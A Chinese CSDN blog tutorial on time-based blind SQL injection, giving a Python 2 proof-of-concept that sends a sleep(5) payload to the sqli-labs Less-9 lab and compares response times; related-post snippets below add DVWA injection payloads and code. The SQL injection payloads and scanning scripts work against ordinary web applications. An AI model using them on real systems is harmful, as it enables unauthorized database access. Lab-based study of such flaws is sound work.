渗透测试之POC基于时间的sql盲注

最新推荐文章于 2024-06-03 07:48:05 发布
最新推荐文章于 2024-06-03 07:48:05 发布
阅读量1.7k 收藏 1
点赞数
分类专栏: web安全 文章标签: poc
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq1124794084/article/details/78960120
版权

这次写写基于时间的sql盲注。

当整个页面没有地方显示数据的时候,这时候存在sql注入,我用md5()函数也没有地方响应出来。那么执行什么函数去证明存在注入呢?sleep()函数,页面执行了,sleep()函数后,从发请求到完全响应就有一个固定的延迟时间。

下面来看测试网站:


无论你ID=多少他都是  you are in .....

基于时间盲注最常见的语句就是  If(ascii(substr(database(),1,1))>115,0,sleep(5))%23   意思是如果数据库名称的第一个字母是ascii编码为大于115(即字母s),那么延迟5秒钟。

所以把这个盲注的poc拼接上去我们看看效果


可以看到响应时间为6.59秒,超过我们延迟的5秒。

如果我们直接这样写,那网络不好或者本来网站很差响应很慢肯定会产生大量的误报问题。

所以正确是写法是先发一次请求,得到一个正常的响应时间。

然后再poc发一次请求,得到一个带延迟的响应时间。理论上两个时间差大于5秒,实际上在4秒之间,这样才判断存在基于时间的sql盲注,这样误报会降低很多。

SO  开始根据这个思路写无框架的POC

#coding:utf-8
import requests
import sys
import time


def verify(url):
    target1 = url + "/Less-9/?id=1"
    target2 = url + "/Less-9/?id=1%27%20and%20if(ascii(substr(database(),1,1))>115,%200,%20sleep(5))%20%23"
    try:
        #记录正常请求的时间
        start_time1 = time.time()
        req1 = requests.get(target1)
        response1 = req1.text
        now_time1 = time.time() - start_time1
        print now_time1
        #记录POC发送的时间
        start_time2 = time.time()
        req2 = requests.get(target2)
        response2 = req2.text
        now_time2 = time.time() - start_time2
        print now_time2
        #print response
        #判断响应时间
        now_time = now_time2 - now_time1
        print now_time
        if now_time >= 4:
            print "%s is vulnerable" %target2
        else:
            print "%s is not vulnerable" %target2
    except Exception,e:
        print "Something happend...."
        print e
        
def main():
    args = sys.argv
    url = ""
    if len(args) == 2:
        url = args[1]
        #print url
        verify(url)
    else:
        print "Usage:python %s url"%(args[0])
        
if __name__ == '__main__':
    main()

测试效果



黑面狐
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL初学(3):时间盲注
m0_64417923的博客
05-05 2004
一,时间盲注 如果页面对于sql语句的执行没有任何回显,或者说回显没有任何差异时,可以使用时间盲注 使用的语句: if 语句: if(<condition>,<true_expr>,<false_expr>) 对condition的结果进行判断,如果返回为true就执行 true_expr ,返回为false就执行 false_expr sleep语句: sleep(<seconds>) 让程序静默一段时间再继续执行...
渗透测试常用poc、工具集合
01-06
poc包含近100多个常用的poc,还有很多工具集。全是博主自己用的,现在免费分享,下面是列举的前10个poc: CVE-2019-0708-msf快速搭建 CVE-2019-10173 Xstream 1.4.10版本远程代码执行漏洞 CVE-2019-16131 OKLite v...
时间盲注poc编写
weixin_30699465的博客
04-30 196
当测试注入漏洞时,页面没有返还结果,连报错都没有时,可以考虑延时。 比如这条语句 ?type=1 and if(length(database())=%d,sleep(5),1) 如果这条语句被服务器正确执行,那么服务器返回数据强要比平时慢5秒,通过比较时间来判断正确还是错误。 这就给我们编程提供了思路,如果要猜测一个字段可以先猜测其长度,在一个猜每一个字符 这次依旧是webug的一道练习...
SQL注入-时间盲注
最新发布
WolvenSec的博客
06-03 1693
SQL时间盲注(Time-based Blind SQL Injection),又叫延时注入,是一种SQL注入攻击技术,用于在无法直接获取查询结果或查看响应内容变化的情况下,通过引入时间延迟来推断数据库的信息;时间盲注依赖于数据库执行查询时的时间延迟,通过观察响应时间的变化,攻击者可以推测出查询结果。这里以Sqli-Labs靶场的Less-9关卡为例子来阐述时间盲注的具体思路:进入关卡首先构建参数id。
SQL注入——时间盲注
heyingcheng的博客
03-07 1086
web页面只返回一个正常页面。利用,逐个猜解数据。但是前提是数据库会执行命令代码,只是不反馈页面信息。回顾:当页面有回显选择当页面没有回显但是有报错信息选择当页面既没有回显也没有报错,但是有页面真假值,选择没有回显,没有报错,没有页面真假值,选择。
SQL注入类型(详细讲解)
diaobusi的博客
10-27 849
在进行SQL注入测试的时候,确实很重要要知道目标SQL语句是什么类型,因为不同类型的SQL语句对注入的有效载荷(payload)有不同的语法要求。
浅谈盲注中的基于时间型和布尔型的注入方法
pygain的博客
11-08 2万+
SQL显错注入已经被用烂了像这种漏洞,漏洞批量发现工具找一找,sqlmap跑一跑。 今天讲的是在我们的命令被带入数据库查询语句但是却什么都没有返回的情况我们该怎么办。例如应用程序就会返回一个“通用的”的页面,或者重定向一个通用页面(可能为网站首页)。这时,我们之前学习的SQL注入办法就无法使用了。 盲注,即在SQL注入过程中,SQL语句执行选择后,选择的数据不能回显到前端,我们需要使用一些特殊的方法进行判断或尝试,这个过程称为盲注
poc练习-dvwa靶场sql注入(盲注
qq_44248518的博客
02-24 301
dvwasql注入poc(Python)
SQL注入之时间盲注相关
lee_james的博客
09-07 806
关于sql注入时间盲注应用场景的一些问题。
大牛输出-渗透测试常用poc、工具大集合.zip
08-13
在这个"大牛输出-渗透测试常用poc、工具大集合.zip"压缩包中,我们可以期待找到一系列用于渗透测试的重要资源,包括Proof of Concept(PoC)代码和各种渗透测试工具。 Proof of Concept(PoC)是证明一个安全漏洞...
瑞友天翼2024SQL注入漏洞poc
02-27
标题中的“瑞友天翼2024SQL注入漏洞poc”指的是瑞友天翼2024版本...总的来说,这个主题涉及到的是网络安全中的一个重要环节——SQL注入漏洞的检测和防范,以及如何利用POC脚本进行渗透测试,以提升Web应用的安全性。
DVWA-SQL盲注脚本(全)
10-04
DVWA SQL盲注,Low,Medium,High 三个级别的bool盲注脚本,比较完整,配套解释 : https://blog.csdn.net/csdn_Pade/article/details/82886765
汽车之家POC测试方案.docx
06-20
汽车之家POC测试方案 本文档是关于汽车之家的客服平台测试方案的详细说明,涵盖了项目背景、测试时间、测试说明、测试模块及功能、特别说明和评分表指标项等内容。 项目背景:汽车之家计划构建的客服平台,实现...
中国联通总部信息化软件POC验证测试管理规范_POC测试_
10-03
**中国联通总部信息化软件POC验证测试管理规范** POC(Proof of Concept)测试,也称为概念验证测试,是软件选型过程中的一个重要环节。在这个阶段,潜在的供应商或解决方案会被要求在实际环境中演示其功能、性能和...
Sql注入系列详解(一)---基于时间差的盲注
AI.PLAY
05-07 1万+
Sql 基于时间盲注   基于的原理是,当对数据库进行查询操作,如果查询的条件不存在,语句执行的时间便是0.但往往语句执行的速度非常快,线程信息一闪而过,得到的执行时间基本为0. 例如: 于是sleep(N)这个语句在这种情况下起到了非常大的作用。  Select sleep(N)可以让此语句运行n秒钟。 但是如果查询语句的条件不存在,执行的时间便是0,利用该函数
基于时间sql盲注入python脚本
weixin_30265103的博客
05-29 599
1 # coding:utf-8 2 import requests 3 import datetime 4 import time 5 6 # 获取数据库名长度 7 8 9 def database_len(): 10 for i in range(1, 10): 11 url = '''http://127.0....
python mysql盲注脚本
夜班机器人的博客
07-26 2523
某相亲网漏洞,可盲注获得手机号和微信号。 功能1:爬取所有女性ID、年龄、月薪、照片URL 功能2:通过盲注方式获取对应ID的手机号和微信号 功能3:所有数据自动导入MYSQL 缺点:单线程
盲注学习(sqli-labs 8(布尔盲注) 9(时间盲注))
筱阳的博客
06-06 1545
所以称为盲注是因为他不会根据你sql注入的攻击语句返回你想要知道的错误信息。盲注分为两类:    1.布尔盲注 布尔很明显Ture跟Fales,也就是说它只会根据    你的注入信息返回Ture跟Fales,也就没有了之前的报错信息。    2.时间盲注 界面返回值只有一种,true 无论输入任何值 返回情况都会按正常的来处理。加入特定的时间函数,通过查看web页面返回的时间差来判断注入的语句是否...
Drupal 7.31 SQL注入分析及POC
热门推荐
Exploit的小站~
05-10 2万+
这个漏洞昨天爆出的,今天才有时间看代码。 在Drupal中,执行sql语句都是使用PDO模型进行的,这样做一般来说是可以规避大多数的注入,因为占位符的使用对sql语句的语法进行了限制。 但是这也不意味着绝对的安全,比如这次的漏洞。 在Drupal的user模块中,找到user.module: $account = db_query("SELECT * FROM {users} WHER...
使用poc对DVWA(security=low)进行sql注入和盲注攻击
07-12
对DVWA(Damn Vulnerable Web Application)进行SQL注入和盲注攻击是为了演示和学习安全性问题,需要在合法授权和合规的环境下进行。以下是一个简单的POC(Proof of Concept)来对DVWA进行SQL注入和盲注攻击: 1. SQL注入攻击: ```python import requests # 设置目标URL和payload target_url = "http://dvwa.com/vulnerabilities/sqli/?id=" payload = "' OR '1'='1'-- " # 发送注入请求 response = requests.get(target_url + payload) # 判断注入是否成功 if "User ID exists in the database." in response.text: print("SQL注入成功!") else: print("SQL注入失败!") ``` 在上述代码中,我们构造了一个payload,其中使用了SQL注入的技巧,目的是绕过原始查询条件,使查询结果始终为真。然后,我们使用requests库发送带有payload的GET请求到目标URL。最后,根据返回的响应内容来判断注入是否成功。 2. 盲注攻击: ```python import requests # 设置目标URL和payload target_url = "http://dvwa.com/vulnerabilities/sqli_blind/" payload = "' OR substring((SELECT database()), 1, 1)='d'-- " # 发送盲注请求 response = requests.get(target_url + "?id=" + payload) # 判断盲注是否成功 if "User ID exists in the database." in response.text: print("盲注成功!") else: print("盲注失败!") ``` 在上述代码中,我们构造了一个payload,其中使用了盲注的技巧,通过逐个查询数据库名称的字符,并通过判断响应内容来确定字符是否正确。然后,我们使用requests库发送带有payload的GET请求到目标URL。最后,根据返回的响应内容来判断盲注是否成功。 请注意,以上代码仅用于演示和学习目的,不得用于非法用途。在实际环境中进行安全测试时,请遵循合法和合规的规定,并获得合适的授权。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值